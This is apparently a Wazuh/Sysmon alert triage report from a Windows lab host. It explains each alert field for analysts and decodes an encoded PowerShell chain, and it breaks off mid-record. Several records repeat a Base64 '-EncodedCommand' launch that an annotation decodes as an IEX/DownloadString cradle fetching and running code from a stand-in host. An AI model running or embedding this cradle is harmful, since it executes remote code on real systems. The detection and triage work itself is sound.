data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bce1-680a-dc0a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  12012
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:02.078+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:02.078+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  34
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534222.1150742
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:36:22.3308890Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282753
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:36:22.313 ProcessGuid: {94294ddc-bce5-680a-df0a-000000000e00} ProcessId: 10556 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_afeyzpts.2r4.ps1 CreationUtcTime: 2025-04-24 22:36:22.313 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:36:22.313
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bce5-680a-df0a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  10556
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_afeyzpts.2r4.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:36:22.313
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
Account that wrote the file. Same user as the EID1 alerts, which ties this file create to the encoded-command PowerShell chain.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:02.270+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059.001 – Command and Scripting Interpreter: PowerShell

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:02.270+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  31
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534222.1153511
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
ETW provider that emitted the event. Microsoft-Windows-Sysmon means the data.win.eventdata fields follow Sysmon's schema for this eventID.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
GUID of the ETW provider. {5770385f-c22a-43e0-bf4c-06f5698ffbd9} is Sysmon's fixed provider GUID, handy for filtering when the name is absent.

data.win.system.eventID:  1
Event ID within this provider. For Sysmon, 1 = Process Create, 11 = FileCreate, 3 = Network Connect; this is not the Security-log numbering (4688, 4624), even though the same concepts appear there.

data.win.system.version:  5
Schema version of this event type's data layout. Sysmon bumps it when fields are added (ParentUser, for example), so parsers should key on eventID plus version rather than on field position.

data.win.system.level:  4
Windows event level: 1 Critical, 2 Error, 3 Warning, 4 Information, 5 Verbose. Sysmon writes everything at 4, so this carries no signal; severityValue is the same value spelled out.

data.win.system.task:  1
Task category number. Sysmon sets it equal to the event ID, so it adds nothing here; in Security-log events it names the audit category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:36:23.3718738Z
When the Windows event log wrote the record (UTC, 100 ns resolution). Slightly later than data.win.eventdata.utcTime; order events by eventRecordID and utcTime, not by this.

data.win.system.eventRecordID:  282772
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
PID of the Sysmon service that logged the event, not of the process the event describes (that is data.win.eventdata.processId).

data.win.system.threadID:  4740
Thread inside the Sysmon service (see data.win.system.processID) that wrote this record. Logger metadata, not a property of the suspect process.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
Event log channel the record came from. Microsoft-Windows-Sysmon/Operational means Sysmon telemetry, so read eventID with Sysmon's numbering (1 = Process Create, 11 = FileCreate), not the Security log's.

data.win.system.computer:  Attacker
Hostname Windows stamped into the event. Should equal agent.name; a mismatch means the agent is forwarding another host's logs or the machine was renamed.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:36:22.844 ProcessGuid: {94294ddc-bce6-680a-e10a-000000000e00} ProcessId: 2804 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bce5-680a-df0a-000000000e00} ParentProcessId: 10556 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
Sysmon's rendered text for the event. Every field in it is also broken out under data.win.eventdata below, so pivot on those and keep this string for the ticket.

data.win.eventdata.utcTime:  2025-04-24 22:36:22.844
When the process was created on the endpoint (UTC), stamped by Sysmon. The alert timestamp is about 40 s later here because of agent-to-manager delay; build the attack timeline from this field.

data.win.eventdata.processGuid:  {94294ddc-bce6-680a-e10a-000000000e00}
Sysmon's GUID for the new process, unique for its lifetime even when the PID is reused. This is the join key to every other Sysmon event from the same process (file writes, network connects, its own children via parentProcessGuid).

data.win.eventdata.processId:  2804
Windows PID of the new process. PIDs are recycled after exit, so use it for live triage only and pivot on processGuid for everything else.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Full path of the executable that was launched. Confirm it is the expected system location (System32 here); a powershell.exe copied to a user-writable path is a red flag.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
Version resource from the image's PE header. 10.0.26100.x is a Windows 11 24H2 / Server 2025 build; a version that does not match the host's OS build points to a copied or back-level binary.

data.win.eventdata.description:  Windows PowerShell
Description string from the PE version resource. Genuine on a Microsoft-signed binary, but trivially set on an attacker's own file, so treat it as context, not as trust.

data.win.eventdata.product:  Microsoft® Windows® Operating System
Product name from the PE version resource, same caveat as description.

data.win.eventdata.company:  Microsoft Corporation
Company name from the PE version resource. For a real Windows binary it agrees with description and product; confirm with the hash when in doubt.

data.win.eventdata.originalFileName:  PowerShell.EXE
Internal file name from the PE version resource. Compare with image: if they differ (OriginalFileName PowerShell.EXE but the image is named something else) the binary was renamed to dodge name-based rules (T1036.003).

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
Full command line as launched. -NoLogo -NoProfile -EncodedCommand is the classic fileless launch pattern; the Base64 is UTF-16LE text and here decodes to IEX(New-Object Net.WebClient).DownloadString('https://example.com/test'), a download cradle (T1059.001 leading to T1105). Decode every -EncodedCommand before closing the alert.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
Working directory of the new process. The user profile root here; launches from Temp, Downloads or Public are more suspicious.

data.win.eventdata.user:  Attacker\\Attcker1
Account the new process runs as (DOMAIN\user). A local account on host Attacker here; together with logonId it groups everything that logon session did.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
GUID of the logon session. Joins to Security event 4624 on the same host to learn how and from where the user logged in (interactive, RDP, network).

data.win.eventdata.logonId:  0x26584
Logon session ID (hex LUID). Every process sharing 0x26584 belongs to the same logon; matches SubjectLogonId / TargetLogonId in Security events 4624 and 4688.

data.win.eventdata.terminalSessionId:  1
Windows session number. 0 is the services session; 1 or higher is an interactive console or RDP session, so this ran on a logged-on user's desktop.

data.win.eventdata.integrityLevel:  Medium
Process integrity level (Low, Medium, High, System). Medium is an unelevated standard user; High would mean the attacker already had admin rights past UAC.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
Hashes of the image, in the algorithms the Sysmon config requested (SHA256 only here). Check against the known-good hash of this OS build's powershell.exe or a reputation service; the identical hash in every EID1 here confirms the same binary each time.

data.win.eventdata.parentProcessGuid:  {94294ddc-bce5-680a-df0a-000000000e00}
Sysmon GUID of the parent process; follow it to the parent's own EID1. Here it is another powershell.exe carrying the same encoded command, so keep walking up until the command line changes to find where the chain really began.

data.win.eventdata.parentProcessId:  10556
PID of the parent at creation time. Subject to reuse; prefer parentProcessGuid for joins.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Executable of the parent. powershell.exe spawning powershell.exe is what rule 92057 keys on; an Office application, a browser or wscript.exe here would point at a phishing delivery instead.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
Parent's full command line. Identical to commandLine: the same encoded payload is re-launching itself. In this report the chain runs PID 10556 → 2804 → 14284; treat it as one activity and find the first ancestor whose command line differs.

data.win.eventdata.parentUser:  Attacker\\Attcker1
Account the parent ran as. Same as user here; a change along the chain (user to SYSTEM, for instance) marks a privilege escalation step.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:02.285+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:02.285+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human-readable summary of why the rule fired. Read it first, then check it against the data: here the 'executable' is a .ps1 policy-test file that PowerShell writes on every start (see targetFilename), so the headline overstates what happened.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  35
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534222.1161578
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
ETW provider that emitted the event. Microsoft-Windows-Sysmon means the data.win.eventdata fields follow Sysmon's schema for this eventID.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
GUID of the ETW provider. {5770385f-c22a-43e0-bf4c-06f5698ffbd9} is Sysmon's fixed provider GUID, handy for filtering when the name is absent.

data.win.system.eventID:  11
Event ID within this provider. For Sysmon, 11 = FileCreate, 1 = Process Create, 3 = Network Connect; this is not the Security-log numbering (4663, 4688), even though the same concepts appear there.

data.win.system.version:  2
Schema version of this event type's data layout. Sysmon bumps it when fields are added, so parsers should key on eventID plus version rather than on field position.

data.win.system.level:  4
Windows event level: 1 Critical, 2 Error, 3 Warning, 4 Information, 5 Verbose. Sysmon writes everything at 4, so this carries no signal; severityValue is the same value spelled out.

data.win.system.task:  11
Task category number. Sysmon sets it equal to the event ID, so it adds nothing here; in Security-log events it names the audit category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:36:23.5843071Z
When the Windows event log wrote the record (UTC, 100 ns resolution). Slightly later than data.win.eventdata.utcTime; order events by eventRecordID and utcTime, not by this.

data.win.system.eventRecordID:  282774
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
PID of the Sysmon service that logged the event, not of the process the event describes (that is data.win.eventdata.processId).

data.win.system.threadID:  4740
Thread inside the Sysmon service (see data.win.system.processID) that wrote this record. Logger metadata, not a property of the suspect process.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
Event log channel the record came from. Microsoft-Windows-Sysmon/Operational means Sysmon telemetry, so read eventID with Sysmon's numbering (1 = Process Create, 11 = FileCreate), not the Security log's.

data.win.system.computer:  Attacker
Hostname Windows stamped into the event. Should equal agent.name; a mismatch means the agent is forwarding another host's logs or the machine was renamed.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:36:23.575 ProcessGuid: {94294ddc-bce6-680a-e10a-000000000e00} ProcessId: 2804 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_3s1iuxjl.0fp.ps1 CreationUtcTime: 2025-04-24 22:36:23.575 User: Attacker\Attcker1"
Sysmon's rendered text for the event. Every field in it is also broken out under data.win.eventdata below, so pivot on those and keep this string for the ticket.

data.win.eventdata.utcTime:  2025-04-24 22:36:23.575
When the file was created on the endpoint (UTC), stamped by Sysmon. About 0.7 s after the EID1 for the same processGuid (PID 2804) and about 40 s before the alert timestamp; build the timeline from this field.

data.win.eventdata.processGuid:  {94294ddc-bce6-680a-e10a-000000000e00}
Sysmon's GUID for the writing process. It matches the processGuid of the rule 92057 EID1 alert above (PID 2804), so this file create belongs to that encoded-command PowerShell.

data.win.eventdata.processId:  2804
Windows PID of the writing process. PIDs are recycled after exit, so use it for live triage only and pivot on processGuid for everything else.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Full path of the process that wrote the file. Here powershell.exe itself; the EID1 with the same processGuid tells you how that PowerShell was started.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_3s1iuxjl.0fp.ps1
Path of the file that was created. __PSScriptPolicyTest_<random>.ps1 in a Temp directory is the probe file Windows PowerShell writes on every start to test whether AppLocker/WDAC constrains scripts. It is a by-product of powershell.exe launching, not a dropped payload; the launch itself (the EID1 with the same processGuid) is what needs review.

data.win.eventdata.creationUtcTime:  2025-04-24 22:36:23.575
Creation time recorded on disk for the file. Normally within milliseconds of utcTime (equal here); a much earlier value means an existing file was overwritten or its timestamp was manipulated (which Sysmon reports separately as EID 2).

data.win.eventdata.user:  Attacker\\Attcker1
Account that wrote the file. Same user as the EID1 alerts, which ties this file create to the encoded-command PowerShell chain.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell process created an executable file in Windows root folder

🧠 What happened? Powershell process created an executable file in Windows root folder

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:02.446+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:02.446+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  9
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell process created an executable file in Windows root folder
Human-readable summary of why the rule fired. Check it against the data: the file is PowerShell's own policy-test script written to C:\Windows\SystemTemp, and the real question is why a PowerShell was running as SYSTEM (see user).

rule.id:  92205
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534222.1164343
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
ETW provider that emitted the event. Microsoft-Windows-Sysmon means the data.win.eventdata fields follow Sysmon's schema for this eventID.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
GUID of the ETW provider. {5770385f-c22a-43e0-bf4c-06f5698ffbd9} is Sysmon's fixed provider GUID, handy for filtering when the name is absent.

data.win.system.eventID:  11
Event ID within this provider. For Sysmon, 11 = FileCreate, 1 = Process Create, 3 = Network Connect; this is not the Security-log numbering (4663, 4688), even though the same concepts appear there.

data.win.system.version:  2
Schema version of this event type's data layout. Sysmon bumps it when fields are added, so parsers should key on eventID plus version rather than on field position.

data.win.system.level:  4
Windows event level: 1 Critical, 2 Error, 3 Warning, 4 Information, 5 Verbose. Sysmon writes everything at 4, so this carries no signal; severityValue is the same value spelled out.

data.win.system.task:  11
Task category number. Sysmon sets it equal to the event ID, so it adds nothing here; in Security-log events it names the audit category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:36:24.7064061Z
When the Windows event log wrote the record (UTC, 100 ns resolution). Slightly later than data.win.eventdata.utcTime; order events by eventRecordID and utcTime, not by this.

data.win.system.eventRecordID:  282787
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
